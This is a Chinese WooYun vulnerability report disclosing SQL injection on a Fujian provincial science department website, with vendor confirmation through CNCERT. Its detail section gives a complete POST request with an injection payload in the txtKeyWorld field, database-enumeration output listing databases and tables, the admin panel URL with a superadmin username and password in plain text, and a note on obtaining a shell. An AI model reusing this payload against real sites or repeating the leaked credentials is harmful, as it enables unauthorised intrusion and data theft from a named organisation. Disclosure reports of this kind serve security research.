当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112231

漏洞标题:福建省科技厅某站sql注入

相关厂商:福建省科技厅

漏洞作者: wclqust

提交时间:2015-05-20 17:30

修复时间:2015-07-09 11:00

公开时间:2015-07-09 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

福建省科技厅 福建省星火网 存在sql注入 可脱裤 可进后台(超级管理员) sa用户 可getshell

详细说明:

1.注入链接及参数 注入点是“txtKeyWorld”
poc:
http://www.fjsp.gov.cn:80/web/Xmxx.aspx (POST)
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKLTU5MjYxMTk4Ng9kFgJmD2QWAgIDD2QWCAIPDxAPFgYeDURhdGFUZXh0RmllbGQFCHR5cGVuYW1lHg5EYXRhVmFsdWVGaWVsZAUGdHlwZUlEHgtfIURhdGFCb3VuZGdkEBUGEi0tLeaJgOacieagj%2Bebri0tLQzmlrDpl7vnrqHnkIYM5pif54Gr5Yqo5oCBDOaUv%2BetluazleinhAzmmJ/ngavnp5HmioAM6Ie05a%2BM5L%2Bh5oGvFQYBMAExATIBMwE0ATUUKwMGZ2dnZ2dnFgFmZAIRDxBkEBUBEi0tLeaJgOacieWGheWuuS0tLRUBATAUKwMBZ2RkAhcPZBYCAgsPPCsADQEADxYEHwJnHgtfIUl0ZW1Db3VudAJEZBYCZg9kFihmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAmYPZBYCZg8VAgI3NDbnpo/lu7rnnIHlhpzmnZHnp5HmioDkv6Hmga/otYTmupDlhbHkuqvkuI7mnI3liqHlubPlj7BkAgIPZBYCZg9kFgJmDxUCAjczOemyn%2BmxvOS6uuW3pee5geiCsuWSjOmxvOexvemFseW8gOWPkeaKgOacr%2BeglOeptuS4juekuuiMg2QCAw9kFgJmD2QWAmYPFQICNzIw6YCf55Sf5p6X5Zyw5Lu/6YeO55Sf56eN5qSN54G16Iqd56S66IyD5LiO5o6o5bm/ZAIED2QWAmYPZBYCZg8VAgI3MTzmlL/lkozljr/igJzmlL/lkoznmb3ojLbigJ3kuqfkuJrljJblhbPplK7mioDmnK/noJTnqbbnpLrojINkAgUPZBYCZg9kFgJmDxUCAjcwJOaYjua6quWkqeeEtuiNr%2BeJqeS6p%2BS4muenkeaKgOekuuiMg2QCBg9kFgJmD2QWAmYPFQICNjk86aOf55So6I%2BM5paw5ZOB56eN6YCJ6IKy5Y%2BK5a6J5YWo55Sf5Lqn5oqA5pyv56CU56m25LiO56S66IyDZAIHD2QWAmYPZBYCZg8VAgI2ODzljZflronluILnsq7msrnpo5/lk4Hmt7HliqDlt6XmioDmnK/lvIDlj5Hlj4rkuqfkuJrljJbnpLrojINkAggPZBYCZg9kFgJmDxUCAjY3LeW7tuW5s%2BWMuuaon%2BWxnuWkqeeEtummmeaWmeS6p%2BS4muenkeaKgOekuuiMg2QCCQ9kFgJmD2QWAmYPFQICNjY26Zye5rWm5Y6/5aSn5by55raC6bG85Lq65bel6IKy6IuX5Y%2BK5YW75q6W5oqA5pyv56S66IyDZAIKD2QWAmYPZBYCZg8VAgI2NTDov57ln47nuqLlv4PlnLDnk5zkuqfkuJrpk77np5HmioDliJvmlrDkuI7npLrojINkAgsPZBYCZg9kFgJmDxUCAjY0OeW7uueTr%2BW4guerueexu%2Bi1hOa6kOe7vOWQiOWIqeeUqOWFs%2BmUruaKgOacr%2BW8gOWPkeekuuiMg2QCDA9kFgJmD2QWAmYPFQICNjM/5Z%2BO5Y6i5Yy66I%2By5b6L5a6%2B6Juk5LuU6Imv56eN6YCJ6IKy5ZKM5YGl5bq35YW75q6W5oqA5pyv56S66IyDZAIND2QWAmYPZBYCZg8VAgI2MkXojZTln47ljLrml6DlhazlrrPolKzoj5zvvIjpo5/nlKjoj4zvvInns7vliJfkuqflk4HliqDlt6XmioDmnK/npLrojINkAg4PZBYCZg9kFgJmDxUCAjYxLeaymeWOv%2BWGnOWJr%2BS6p%2BWTgeeyvua3seWKoOW3peS6p%2BS4muWMluekuuiMg2QCDw9kFgJmD2QWAmYPFQICNjAq6JWJ5Z%2BO5Yy65LyY5Yq/55Wc54mn5Lia5Lqn5Lia6ZuG576k5bu66K6%2BZAIQD2QWAmYPZBYCZg8VAgI1OTcg5pS/5ZKM55m96Iy2546w5Luj55Sf5Lqn5oqA5pyv6ZuG5oiQ5LiO5Lqn5Lia5YyW56S66IyDZAIRD2QWAmYPZBYCZg8VAgI1ODDov57msZ/ljr/lpKflvLnmtoLpsbzop4TojIPljJblhbvmrpbmioDmnK/npLrojINkAhIPDxYCHwRoZGQCEw9kFgJmD2QWCmYPDxYCHgRUZXh0BQE0ZGQCAQ8PFgIfBQUBMWRkAgIPDxYCHwUFAjE3ZGQCAw8PFgIfBGhkZAIEDw8WAh8EaGRkAhkPDxYCHwUFBzQyNzI1MjVkZBgBBSNjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJEdyaWRWaWV3MQ88KwAKAQgCBGS/h%2B0ivNLswCELWhLGE%2BtIO6MbXA%3D%3D&__VIEWSTATEGENERATOR=2B05F96C&__EVENTVALIDATION=/wEWGwKP1LDgAgL32/PyCwLVzJXYCgKg7emrBgLdp/a7DQLaxcs/Asqq4dEMAtWq4dEMAtSq4dEMAteq4dEMAtaq4dEMAtGq4dEMArKlwcsBAs3mwYcOAuXbjIoMAqyXxrIJAq2XxrIJAq6XxrIJAq%2BXxrIJAuX%2BgewOAqzo7/sOAqGVwa0EAqa4yuADAozE/IANAqCf2ZQEAvX4hv0IAvjjhcEPfjGyXTYznABIJjUSGdrUV9TvjxI%3D&ctl00$txtUserName=&ctl00$txtPwd=&ctl00$DrLangMu=0&ctl00$DrMeiRong=0&ctl00$txtSelect=&ctl00$ContentPlaceHolder1$DrType=1&ctl00$ContentPlaceHolder1$txtKeyWorld=aa' or '1%25'%3D'1&ctl00$ContentPlaceHolder1$txtBegin=&ctl00$ContentPlaceHolder1$txtEnd=&ctl00$ContentPlaceHolder1$btSelect=%E6%9F%A5%E6%89%BE&ctl00$ContentPlaceHolder1$GridView1$ctl20$txtNewPageIndex=1
2.拖库
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [8]:
[*] city
[*] fjspDB
[*] LwDataBase
[*] master
[*] model
[*] msdb
[*] tempdb
[*] TwfDataBase
3.获取当前数据库(fjspDB)表
Database: fjspDB
[20 tables]
+-------------------------------+
| NewsList |
| ViewUserRole |
| fjip_Item |
| fjsp_NewComment |
| fjsp_News |
| fjsp_NewsType |
| fjsp_RolePermissions |
| fjsp_User |
| fjsp_UserRole |
| sysdiagrams |
| t_xinghuo_authenticate |
| t_xinghuo_bearproj |
| t_xinghuo_companyinfo |
| t_xinghuo_companyinfo_honor |
| t_xinghuo_projachievementinfo |
| t_xinghuo_projinfo |
| t_xinghuo_richtopic |
| t_xinghuo_stpeople |
| t_xinghuo_stproj |
| t_xinghuo_winningachi
4.获取 fjsp_User 中超级管理员用户 进入后台
地址http://www.fjsp.gov.cn/admin
用户名密码 superadmin/1q2w3e\
5.利用 sqlmap 交互shell 未做深入

漏洞证明:

1.png

2.png

修复方案:

防注入

版权声明:转载请注明来源 wclqust@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-25 10:59

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论